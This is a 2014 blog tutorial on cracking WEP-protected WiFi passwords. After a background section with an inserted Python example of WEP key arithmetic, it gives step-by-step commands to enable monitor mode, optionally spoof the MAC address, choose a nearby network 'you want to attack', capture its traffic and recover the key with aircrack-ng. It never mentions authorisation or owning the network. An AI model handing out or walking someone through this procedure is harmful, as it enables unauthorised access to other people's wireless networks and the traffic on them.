
Wednesday, 25 June 2014

Hacking WiFi (WEP Encryption)

CRACKING WEP PASSWORDS

 

 

 
WIFI HACKING

 

Introduction: 

 

In this post we are going to see how to crack WIFI passwords on networks that use WEP protection. WEP stands for "Wired Equivalent Privacy". Wired Equivalent Privacy is an easily broken security algorithm for IEEE 802.11 wireless networks, introduced as part of the original 802.11 standard ratified in September 1999. A 64-bit WEP key is usually entered as a string of 10 hexadecimal (base 16) characters (0-9 and A-F). Each character represents four bits; 10 digits of four bits each give 40 bits, and adding the 24-bit IV produces the complete 64-bit WEP key (4 bits × 10 + 24 bits IV = 64 bit WEP key). Most devices also allow the user to enter the key as 5 ASCII characters (0-9, a-z, A-Z), each of which is turned into eight bits using the character's byte value in ASCII (8 bits × 5 + 24 bits IV = 64 bit WEP key); however, this restricts each byte to be a printable ASCII character, which is only a small fraction of possible byte values, greatly reducing the space of possible keys.
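The key arithmetic above, worked through as an added example (not code from the original post): it parses both entry forms into the 40-bit secret, prepends a 24-bit IV to form the 64-bit seed, and measures how much the ASCII form shrinks the key space. The function names and sample keys are constructed for illustration; the IV-reuse estimate goes slightly beyond the post and assumes IVs are picked uniformly at random.

```python
import math
import string

IV_BITS = 24                                           # per-packet IV length given in the post
ASCII_ALPHABET = string.digits + string.ascii_letters  # the post's "0-9, a-z, A-Z" (62 symbols)


def parse_wep64_key(entry: str) -> bytes:
    """Return the 5-byte (40-bit) secret for a key typed as 10 hex digits or 5 ASCII characters."""
    if len(entry) == 10 and all(c in string.hexdigits for c in entry):
        return bytes.fromhex(entry)                    # 4 bits x 10 digits
    if len(entry) == 5 and all(c in ASCII_ALPHABET for c in entry):
        return entry.encode("ascii")                   # 8 bits x 5 characters
    raise ValueError("expected 10 hex digits or 5 characters from 0-9, a-z, A-Z")


def rc4_seed(iv: bytes, secret: bytes) -> bytes:
    """Build the 64-bit per-packet seed: the 24-bit IV followed by the 40-bit secret."""
    if len(iv) * 8 != IV_BITS or len(secret) != 5:
        raise ValueError("need a 3-byte IV and a 5-byte secret")
    return iv + secret


def effective_bits(alphabet_size: int, length: int) -> float:
    """Entropy in bits of a uniformly random key of `length` symbols."""
    return length * math.log2(alphabet_size)


def iv_reuse_probability(packets: int) -> float:
    """Birthday-bound estimate that at least two of `packets` IVs are equal.

    Assumption (not stated in the post): IVs are chosen uniformly at random.
    """
    return 1.0 - math.exp(-packets * (packets - 1) / (2 * 2 ** IV_BITS))


if __name__ == "__main__":
    hex_secret = parse_wep64_key("0123456789")         # constructed sample keys
    ascii_secret = parse_wep64_key("Wep01")
    print("seed:", rc4_seed(bytes.fromhex("a1b2c3"), ascii_secret).hex())
    print(f"hex entry:   {effective_bits(16, 10):.1f} bits")
    print(f"ASCII entry: {effective_bits(len(ASCII_ALPHABET), 5):.1f} bits")
    print(f"ASCII keys cover 1 in {16 ** 10 // len(ASCII_ALPHABET) ** 5} of the 40-bit space")
    print(f"IV reuse within 5000 packets: {iv_reuse_probability(5000):.0%}")
```

The secret itself never changes between packets; only the 24-bit IV does, which is why the seed repeats so quickly on a busy network.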

 

 

Steps to Follow :



Step 1 :


Open the terminal window and type the following command without quotes and press ENTER key.

"airmon-ng"


The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



 
Step 2 :

In the same terminal window type the following command and press ENTER.

"airmon-ng start wlan0"

The result will be something like 

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]
 
             (monitor mode enabled on mon0)


Step 3 (Optional) :

 
Change the MAC address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


 

Step 4 :


"airodump-ng mon0"

Now look at the terminal window; here you will see all the nearby wireless access points that are in your range. Select the target you want to attack that has "WEP" protection enabled. Wait for 1-2 min. Then press "Ctrl+c" to stop the program.
You will see a screen like this:

 
 


Step 5 :
 
Open a new terminal window and type the following command and hit enter 
   
"airodump-ng -c 3 -w wepcrack --bssid ff:ff:ff:ff:ff:ff mon0"

 
* where -c is the channel of your target,
        -w is the file to be written (you can give it any name),
        --bssid is the BSSID of your target.
So replace 3 with your target's channel number and ff:ff:ff:ff:ff:ff with your target's BSSID, and then hit enter.
Keep this terminal running because we have to capture the data that is being transmitted. Remember that you have to keep capturing until the captured data reaches 25000-30000.

TIP: If more users are connected to the wireless network, capturing the data will be faster. Also, you should not be too far from the router.




Step 6 :

The file that contains the captured data will be saved in the HOME folder. The location of the HOME folder is: PLACES (top left corner of the Desktop) >> HOME FOLDER. Now click the HOME folder and keep it open.



Step 7 :

 

To crack the WEP password just enter the command below :

aircrack-ng 'wepcrack-01.cap'

"wepcrack-01.cap" is our captured data file located in the Home folder. Just drag and drop it in the terminal and hit enter. This will now start the password cracking process and will show the password as text.

Nowadays WEP protection is rarely used, as it does not provide very robust protection and can be cracked easily. So now we have better and more advanced protection such as WPA and WPA2. In the next part, I will show you how to crack WPA/WPA2.

So keep visiting for more .... Have A Nice Day.







© 2020 ETHICAL HACKING. Designed by Vijay Patel